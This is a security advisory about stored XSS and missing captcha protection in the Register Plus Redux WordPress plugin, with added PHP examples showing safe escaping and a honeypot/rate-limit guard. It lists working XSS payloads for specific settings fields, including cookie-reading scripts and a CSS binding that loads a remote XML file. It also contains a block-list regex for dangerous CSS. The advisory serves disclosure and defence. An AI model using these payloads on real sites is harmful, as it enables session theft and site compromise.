XSS and IAA vulnerabilities in Register Plus Redux for WordPress

securityvulns SECURITYVULNS:DOC:27546
Jan 09, 2012 - 12:00 a.m.
vulners.com

Hello 3APA3A!

I want to warn you about multiple new vulnerabilities in the Register Plus Redux plugin for WordPress. The latest version of the plugin was checked. This is the second advisory concerning new vulnerabilities in Register Plus Redux.

These are Cross-Site Scripting and Insufficient Anti-automation vulnerabilities.


Affected products:

Register Plus Redux v3.7.3.1 and earlier versions are vulnerable.

At the request of my client I've made a new version of the plugin with fixes for all the vulnerabilities I found. I named this version Register Plus Redux 3.8 (to distinguish it from the original version of the plugin), so all users of this plugin can find the new, secure version of the plugin on the Internet.


Details:

Persistent XSS (WASC-08):

The following vulnerabilities exist on the page http://site/wp-admin/options-general.php?page=register-plus-redux.

In the fields Email Verification, Admin Verification, User Message (when Custom New User Message is set), User Message (when Custom Verification Message is set), Admin Message (when Custom Admin Notification is set), Custom Register CSS and Custom Login CSS:
</textarea><script>alert(document.cookie)</script>

The code executes on the page http://site/wp-admin/options-general.php?page=register-plus-redux, and for the Email Verification and Admin Verification fields it also executes on the page http://site/wp-login.php?checkemail=registered.

If the following code is set in the Custom Register CSS or Custom Login CSS fields:
body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)}

The code executes on the pages http://site/wp-login.php?action=register and http://site/wp-login.php respectively. It works in Firefox < 3.0; if the XML file is placed on the same site (via the uploader), Firefox 3.0 and higher are affected as well. If the code uses expression, javascript or vbscript in the styles, it executes in IE.

If the following code is set in the Minimum password length field (under User Set Password), with the options Require new users enter a password during registration and Show password strength meter enabled:
1){}};alert(document.cookie);function a(){if(1==1

The code executes on the page http://site/wp-login.php?action=register.

If the following code is set in the Empty, Short, Bad, Good, Strong or Mismatch fields (under User Set Password), with the options Require new users enter a password during registration and Show password strength meter enabled:
"};alert(document.cookie);/*

The code executes on the page http://site/wp-login.php?action=register.

If the following code is set in the Required Fields Style Rules field:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)

The code executes on the page http://site/wp-login.php?action=register. It works in Firefox < 3.0; if the XML file is placed on the same site (via the uploader), Firefox 3.0 and higher are affected as well. If the code uses expression, javascript or vbscript in the styles, it executes in IE.

Strictly social persistent XSS (WASC-08):

In the above-mentioned fields User Message (when Custom New User Message is set), User Message (when Custom Verification Message is set) and Admin Message (when Custom Admin Notification is set), besides the XSS in the field itself there is also XSS via the field's visualization (which is done with jQuery), so when the POST request is sent the code executes twice, and each of these vulnerabilities must be fixed in two places (because even the escaped code executes in the visualization). Besides the attack via a POST request, an XSS attack via the visualization is possible in these three fields, and also in nine other fields (From Email, From Name and Subject in Custom New User Message, Custom Verification Message and Custom Admin Notification), by pasting the XSS code into the field.

I.e. the victim must be tricked into pasting the code into any of these 12 fields; the code can be placed in the victim's clipboard via a clipboard attack (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008056.html). These vulnerabilities are Strictly social XSS (http://websecurity.com.ua/5476/).
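The four payload shapes above (a closing tag inside a textarea, a CSS binding, a number spliced into inline JavaScript, and a string spliced into a JavaScript object literal) each break out of a different output context, and each needs a different fix. The following is an added example written for this page, not the plugin's own code: it takes a constructed settings array containing those payload shapes and renders each field both the defective way and the hardened way. It runs under plain PHP; the element ids `#msg` and `#preview`, the default minimum length of 6 and the CSS allow-list are assumptions. Inside WordPress the same jobs are done by esc_textarea(), absint() and wp_json_encode().

```php
<?php
// Added example (not the plugin's code): rendering plugin settings into four
// output contexts. $opts is a constructed sample holding the payload shapes
// from the advisory; each *_unsafe() function mirrors the defect class and
// each *_safe() the fix. In WordPress use esc_textarea(), absint() and
// wp_json_encode() for the same purposes.

$opts = [
    // constructed values, modelled on the payload shapes in the advisory
    'verification_message' => '</textarea><script>alert(document.cookie)</script>',
    'custom_login_css'     => 'body {-moz-binding:url(http://example.invalid/xss.xml#xss)}',
    'min_pass_length'      => '1){}};alert(document.cookie);function a(){if(1==1',
    'short_label'          => '"};alert(document.cookie);/*',
];

// Context 1: the settings textarea. A closing tag inside the value ends the
// textarea early; HTML-escaping the value keeps it inside.
function textarea_unsafe(array $o): string {
    return "<textarea id=\"msg\" name=\"msg\">{$o['verification_message']}</textarea>";
}
function textarea_safe(array $o): string {
    $v = htmlspecialchars($o['verification_message'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<textarea id=\"msg\" name=\"msg\">{$v}</textarea>";
}

// The client-side visualization must re-insert the value as text, not markup:
// the browser decodes the escaped textarea contents when .val() reads them, so
// passing that string to .html() runs the payload a second time.
function preview_script_safe(): string {
    return "<script>jQuery('#msg').on('input', function () {"
         . " jQuery('#preview').text(jQuery(this).val()); });</script>";
}

// Context 2: a numeric setting echoed into inline JavaScript. Escaping does
// not apply here; the fix is to reject anything but a small positive integer.
function min_length_unsafe(array $o): string {
    return "<script>if(pass.length < {$o['min_pass_length']}){alert('short');}</script>";
}
function min_length_safe(array $o): string {
    $n = filter_var($o['min_pass_length'], FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1, 'max_range' => 64]]);
    if ($n === false) { $n = 6; } // constructed default
    return "<script>if(pass.length < {$n}){alert('short');}</script>";
}

// Context 3: a string label echoed into a JavaScript object literal. A JSON
// encoder emits a quoted string that cannot terminate the literal.
function label_unsafe(array $o): string {
    return "<script>var strength = {short: \"{$o['short_label']}\"};</script>";
}
function label_safe(array $o): string {
    $s = json_encode($o['short_label'], JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return "<script>var strength = {short: {$s}};</script>";
}

// Context 4: free-form CSS. No escaping function makes arbitrary CSS safe; the
// hardened version drops any declaration that uses url(), expression(),
// behavior or -moz-binding (the constructs named in the advisory).
function css_safe(array $o): string {
    $blocked = '/(url\s*\(|expression\s*\(|behavior\s*:|-moz-binding)/i';
    $clean = preg_replace_callback('/[^{};]+:[^;}]+;?/', function ($m) use ($blocked) {
        return preg_match($blocked, $m[0]) ? '' : $m[0];
    }, $o['custom_login_css']);
    return "<style>{$clean}</style>";
}

foreach (['textarea_unsafe', 'textarea_safe', 'min_length_unsafe', 'min_length_safe',
          'label_unsafe', 'label_safe'] as $f) {
    echo $f, ":\n", $f($opts), "\n\n";
}
echo "css_safe:\n", css_safe($opts), "\n\n";
echo "preview_script_safe:\n", preview_script_safe(), "\n";
```

Run with `php example.php` and compare the paired outputs: the hardened textarea keeps the `</textarea>` inside the element as `&lt;/textarea&gt;`, the minimum-length payload is replaced by the default, the label payload becomes a JSON string literal, and the `-moz-binding` declaration is stripped, leaving `body {}`. Escaping on output is what fixes the stored XSS; sanitizing on save (for example with wp_kses()) is a useful second layer but does not replace it, since the visualization reads the raw value back from the form.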

Insufficient Anti-automation (WASC-21):

http://site/wp-login.php?action=register

The registration form has no protection against automated requests (captcha), as in previous versions of the plugin.
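A captcha is one answer to the missing anti-automation control; two lighter controls that need no third-party service are a honeypot field and a per-source rate limit on the registration handler. The following is an added example written for this page, not the plugin's or WordPress core's code: a small mu-plugin that hooks the core `register_form` action (to print an extra field) and the core `registration_errors` filter (to reject a sign-up by adding to its WP_Error). The field name, the limit of 3 sign-ups per 10 minutes and the transient key prefix are constructed for this example.

```php
<?php
// Added example (not the plugin's or WordPress's own code): two anti-automation
// controls for wp-login.php?action=register, written as a mu-plugin. Assumes the
// core 'register_form' action and 'registration_errors' filter; the limits and
// names below are constructed.

define('RPR_EX_WINDOW',   10 * MINUTE_IN_SECONDS); // constructed window
define('RPR_EX_MAX',      3);                      // constructed sign-ups per window per source
define('RPR_EX_HONEYPOT', 'rpr_ex_website');       // constructed field name

// 1. Honeypot: a field hidden from people that naive form-fillers populate.
add_action('register_form', function () {
    echo '<p style="position:absolute;left:-9999px" aria-hidden="true">'
       . '<label>Leave empty <input type="text" name="' . esc_attr(RPR_EX_HONEYPOT)
       . '" tabindex="-1" autocomplete="off"></label></p>';
});

// Per-source key. Only REMOTE_ADDR is trusted; X-Forwarded-For is client-controlled
// unless a trusted reverse proxy overwrites it.
function rpr_ex_source_key(): string {
    $ip = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
    return 'rpr_ex_reg_' . md5($ip);
}

// 2. Rate limit: count attempts per source in a transient that expires by itself.
add_filter('registration_errors', function (WP_Error $errors, $sanitized_user_login, $user_email) {
    if (!empty($_POST[RPR_EX_HONEYPOT])) {
        $errors->add('rpr_ex_honeypot', __('Registration could not be processed.'));
        return $errors;
    }
    $key   = rpr_ex_source_key();
    $count = (int) get_transient($key);
    if ($count >= RPR_EX_MAX) {
        $errors->add('rpr_ex_rate', __('Too many registration attempts. Please try again later.'));
        return $errors;
    }
    set_transient($key, $count + 1, RPR_EX_WINDOW);
    return $errors;
}, 10, 3);
```

Drop the file into wp-content/mu-plugins/ on a test site. Because the filter returns the WP_Error with an added entry rather than exiting, core still shows the message on the form and the user record is never created; both rejection codes (`rpr_ex_honeypot`, `rpr_ex_rate`) are visible to any logging hooked on the same filter, which makes automated registration attempts easy to count.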


Timeline:

2011.11.25 - found vulnerabilities.
2011.11.30 - fixed vulnerabilities.
2011.11.30 - informed developer.
2011.11.30 - released Register Plus Redux 3.8 (with all vulnerabilities of version 3.7.3.1 fixed).
2011.12.01 - announced at my site.
2011.12.05 - released Register Plus Redux 3.8.1 (with new features).
2011.12.31 - disclosed at my site.

I mentioned these vulnerabilities on my site:
http://websecurity.com.ua/5536/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua